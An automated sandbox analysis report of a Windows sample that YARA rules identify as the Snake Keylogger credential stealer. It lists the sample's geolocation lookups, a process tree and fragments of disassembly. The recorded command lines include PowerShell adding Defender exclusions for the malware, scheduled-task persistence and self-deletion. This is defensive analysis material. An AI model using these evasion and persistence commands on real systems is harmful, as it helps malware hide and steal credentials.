Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49761	104.21.48.1	443	7284	C:\Users\user\Desktop\VQsnGWaNi5.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:47 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 21:32:47 UTC	859	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:47 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1859556 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4tY6DrTKNPRuyZntSWEJJVio3P5bhB%2B%2BibA3YLJjg%2FYPnJhOXoUfqAfw4GxKYLz1x3PFsaVgJdzVSMrY%2BcSY8AjKcWqA1%2BICmfbzCNGU6RLnUzgoCmPmql9ZUnPfO0eyHHdYrsuB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fffc81e5c2e43be-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1574&min_rtt=1570&rtt_var=597&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1819314&cwnd=226&unsent_bytes=0&cid=b5fb17749ba75712&ts=129&x=0"
2025-01-10 21:32:47 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49766	104.21.48.1	443	7676	C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:48 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 21:32:48 UTC	859	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:48 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1859557 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u6Mnc93JhNb%2FwN%2FOWgTeYzscu4KV6npxh%2BAWXqv%2FjKVNTIbXMxlANz48PpH4afJ2nLBRLermNxCjKEUqePpfzbyIcRGe1VogdQBi4vN23bacT7V2S%2FEDGI6URSAAWMdo3QNYFwBZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fffc8249cccc461-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1663&min_rtt=1660&rtt_var=629&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1728833&cwnd=228&unsent_bytes=0&cid=55594c90e481f821&ts=143&x=0"
2025-01-10 21:32:48 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49767	104.21.48.1	443	7284	C:\Users\user\Desktop\VQsnGWaNi5.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:49 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 21:32:49 UTC	856	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:49 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1859558 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gSAyI%2B2bp%2BqTGR1GAOTagJNpNUqlp5vNfUpzqW%2FwDJH0EODYsYJtMSipTtFbxcd5z6xWcb7DYoL%2BrFlTlo4CyEB8S31jvZk3Wb4vshMrYdaqXGo0fRNE3SQ9OaRgDub2OFMGti9R"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fffc8273828c461-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1532&min_rtt=1532&rtt_var=766&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4238&recv_bytes=699&delivery_rate=241741&cwnd=228&unsent_bytes=0&cid=9578d23383d5643c&ts=161&x=0"
2025-01-10 21:32:49 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49770	104.21.48.1	443	7676	C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:49 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 21:32:49 UTC	855	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:49 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1859559 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I8NtF9tXW2NbXYG2k28VdsVfGagVD%2BigWHNsNGb8dv4xjL7sanSK5ynIMLEKGj%2BWMbkuAemYvVzHSZHSFfSred9h5BzqGdlN6SkC75DxClChRJc5mMNCiBQzuf%2BLkSJL9FLXNBTS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fffc82bb9a38c15-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1829&min_rtt=1827&rtt_var=690&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1580086&cwnd=238&unsent_bytes=0&cid=14b485a8b61e9be0&ts=149&x=0"
2025-01-10 21:32:49 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49772	104.21.48.1	443	7676	C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:50 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 21:32:51 UTC	861	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:50 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1859560 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dxEZccnv5%2BKOplEG36E54uW64%2F4MSQe%2B0Y2J6BZTjq8qDkcSCNxA7asonMCQtunQr7Xar%2Bw3e3PCUF%2FChNVAQSoryeGAXBOTcGhupTERpKGccRnINhVEy83qM%2Fr6iwGeoOsoOkNH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fffc8327d5042e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1681&min_rtt=1673&rtt_var=644&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1676234&cwnd=240&unsent_bytes=0&cid=76c1cd24ed137f5c&ts=142&x=0"
2025-01-10 21:32:51 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Target ID:	0
Start time:	16:32:31
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\VQsnGWaNi5.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\VQsnGWaNi5.exe"
Imagebase:	0x520000
File size:	830'984 bytes
MD5 hash:	22A9330757374B6B15F04E37C4ACE8E6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1729092792.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1729092792.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1729092792.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1729092792.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	16:32:33
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VQsnGWaNi5.exe"
Imagebase:	0x190000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	16:32:33
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	16:32:33
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe"
Imagebase:	0x190000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	16:32:33
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	16:32:33
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKvCTGbQjXP" /XML "C:\Users\user\AppData\Local\Temp\tmpEED9.tmp"
Imagebase:	0xbe0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	16:32:33
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	16:32:33
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\VQsnGWaNi5.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\VQsnGWaNi5.exe"
Imagebase:	0x530000
File size:	830'984 bytes
MD5 hash:	22A9330757374B6B15F04E37C4ACE8E6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1863654671.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.1863654671.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.1863654671.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000008.00000002.1863654671.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.1866290229.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	16:32:34
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe
Imagebase:	0xca0000
File size:	830'984 bytes
MD5 hash:	22A9330757374B6B15F04E37C4ACE8E6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1777946348.000000000420F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.1777946348.000000000420F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.1777946348.000000000420F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000009.00000002.1777946348.000000000420F000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 87%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	16:32:35
Start date:	10/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	16:32:38
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKvCTGbQjXP" /XML "C:\Users\user\AppData\Local\Temp\tmpD53.tmp"
Imagebase:	0xbe0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	16:32:38
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	16:32:38
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe"
Imagebase:	0x910000
File size:	830'984 bytes
MD5 hash:	22A9330757374B6B15F04E37C4ACE8E6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000D.00000002.1884137452.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000D.00000002.1884137452.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	16:32:48
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\VQsnGWaNi5.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	16:32:48
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	16:32:48
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /C Y /N /D Y /T 3
Imagebase:	0x810000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	16:32:49
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	16:32:49
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	16:32:50
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /C Y /N /D Y /T 3
Imagebase:	0x810000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.3%
Total number of Nodes:	226
Total number of Limit Nodes:	16

Executed Functions

Function 07094128 Relevance: 15.1, Strings: 10, Instructions: 2597COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07096D23
4'^q, xrefs: 07096DAE
4'^q, xrefs: 07096D7E
$^q, xrefs: 07096DD0
(o^q, xrefs: 070941FE
4'^q, xrefs: 07095104
4'^q, xrefs: 07095FE8
4|cq, xrefs: 07096F13
4|cq, xrefs: 07096EF8
4'^q, xrefs: 07094F7C

Memory Dump Source

Source File: 00000000.00000002.1735881144.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7090000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID: (o^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4|cq$4|cq$$^q
API String ID: 0-2723476363
Opcode ID: d62784f9917ed8f93d6eb1f212fa02e6cd24e7f2ac9f9349b506b8f1477ca9d5
Instruction ID: 901a1292fde92a0cad41393b010ccc6acf5c8ce435e267b606b8068ae91fbfa2
Opcode Fuzzy Hash: d62784f9917ed8f93d6eb1f212fa02e6cd24e7f2ac9f9349b506b8f1477ca9d5
Instruction Fuzzy Hash: 4243ECB4A00219CFCF64DF68C998A9DB7B2BF49310F1586A5E449AB361DB31ED81DF40

Function 07093668 Relevance: 7.0, Strings: 5, Instructions: 722COMMON

Download Yara Rule

Strings

(o^q, xrefs: 07093EF1
(o^q, xrefs: 07093EFB
,bq, xrefs: 07093C7F
,bq, xrefs: 07093C8F
Hbq, xrefs: 07093F68

Memory Dump Source

Source File: 00000000.00000002.1735881144.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7090000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$,bq$,bq$Hbq
API String ID: 0-3486158592
Opcode ID: 1789c5a4b34ab33a5a78fc93359e48fb9a468aee4d2672cb1583f63285e99d0c
Instruction ID: 23c6d556c225e8e021744bf02af7eba38c5e4e631c587d751ea0f7da7d52b530
Opcode Fuzzy Hash: 1789c5a4b34ab33a5a78fc93359e48fb9a468aee4d2672cb1583f63285e99d0c
Instruction Fuzzy Hash: CC5270B4A002159FCF58DF69D494A6EFBF2BF84710B158269E8169B3A0DB31EC41DF90

Function 01103E34 Relevance: 2.7, Strings: 2, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

t^vl, xrefs: 01107004
